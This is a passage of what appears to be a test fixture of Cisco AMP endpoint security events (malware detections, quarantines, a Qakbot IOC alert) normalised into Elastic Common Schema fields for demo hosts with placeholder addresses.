"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6411462922463085000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "detection_id": "6411462918168117252", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T12:57:45.000Z", + "file": { + "name": 
"MspthrdHash.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "hash": { + "sha1": "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12", + "sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "md5": "a97fb86da4e010974860e5024137b56b" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "a97fb86da4e010974860e5024137b56b", + "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854002194Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6411462918168117000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411462918168117252", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T12:32:14.000Z", + "file": { + "name": "11179468.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe", + "hash": { + "sha256": 
"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:23.854004118Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + 
"id": "6411456342573187000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.GenericKD:Gen.20fu.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411456342573187074", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T12:32:14.000Z", + "file": { + "name": "AySxs.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe", + "hash": { + "sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:23.854006008Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6411456342573187000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.12081E6CA3-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411456342573187073", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75" + } + }, + "@timestamp": "2021-01-14T12:27:42.000Z", + "file": { + "name": "cmd.exe", + "path": "/C:/Windows/SysWOW64/cmd.exe", + "hash": { + "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + } + }, + 
"ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 4, + "ingested": "2021-09-12T17:32:23.854008008Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. 
A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}", + "kind": "alert", + "start": "2021-01-14T12:27:42.000Z", + "action": "Cloud IOC", + "id": "1492784107692000800", + "category": [ + "file" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Clean", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "cloud_ioc": { + "short_description": "W32.Qakbot.ioc", + "description": "Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen." 
+ }, + "event_type_id": 1107296274 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T12:27:23.000Z", + "file": { + "name": "report.pdf.exe", + "hash": { + "sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Low_Prev_Retro" + ], + "hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Low_Prev_Retro", + "hostname": "Demo_Low_Prev_Retro" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:23.854009893Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}", + "kind": "alert", + "action": "Threat Detected in Low 
Prevalence Executable", + "id": "1458626002840536600", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "df:d1:ed:2d:c8:fc", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "df:d1:ed:2d:c8:fc" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 1107296278 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T12:19:10.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_MAP_FriedEx", + "hostname": "Demo_AMP_MAP_FriedEx" + }, + "event": { + "severity": 0, + "action": "Policy Update", + "ingested": "2021-09-12T17:32:23.854011760Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy 
Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "id": "6583861114428195000", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "04:e6:4d:d5:7a:b5", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "04:e6:4d:d5:7a:b5" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648130 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T12:11:04.000Z", + "file": { + "name": "report.pdf.exe", + "path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe", + "hash": { + "sha1": "5058b16a86beee96927371210b9a9f682976a50a", + "sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "md5": "48a0bf05b9706a00d2a0ff6260412f11" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Low_Prev_Retro" + ], + "hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "48a0bf05b9706a00d2a0ff6260412f11", + "5058b16a86beee96927371210b9a9f682976a50a" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Low_Prev_Retro", + "hostname": "Demo_Low_Prev_Retro" + }, + "event": { + "severity": 0, + "ingested": "2021-09-12T17:32:23.854013646Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}", + "kind": "alert", + "action": "File Fetch Completed", + "id": "6264747552596296000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "df:d1:ed:2d:c8:fc", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "df:d1:ed:2d:c8:fc" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648173 + } + }, + 
"tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "wscript.exe", + "pid": 4744, + "hash": { + "sha1": "2131cff0959d213cd9a5e8a8ac362d265d5b1316", + "sha256": "9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97", + "md5": "045451fa238a75305cc26ac982472367" + } + }, + "@timestamp": "2021-01-14T12:02:58.000Z", + "file": { + "name": "X4.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe", + "hash": { + "sha1": "c235e18bae63d6c4b5daadb833686f943de65a5f", + "sha256": "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "md5": "a659ff79ef7ffacbd61d4c2641379e44" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Qakbot_2" + ], + "hash": [ + "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62", + "a659ff79ef7ffacbd61d4c2641379e44", + "c235e18bae63d6c4b5daadb833686f943de65a5f" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_2", + "hostname": "Demo_Qakbot_2", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854015534Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6411444887895409000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "Auto.A280012EEE.in10.tht.Talos", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "d1:e2:b6:61:ef:7a", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "d1:e2:b6:61:ef:7a" + ] + }, + "group_guids": [ + 
"test_group_guid" + ], + "detection_id": "6411444887895408641", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T12:02:58.000Z", + "file": { + "hash": { + "sha256": "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_2" + ], + "hash": [ + "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_2", + "hostname": "Demo_Qakbot_2" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854017516Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": 
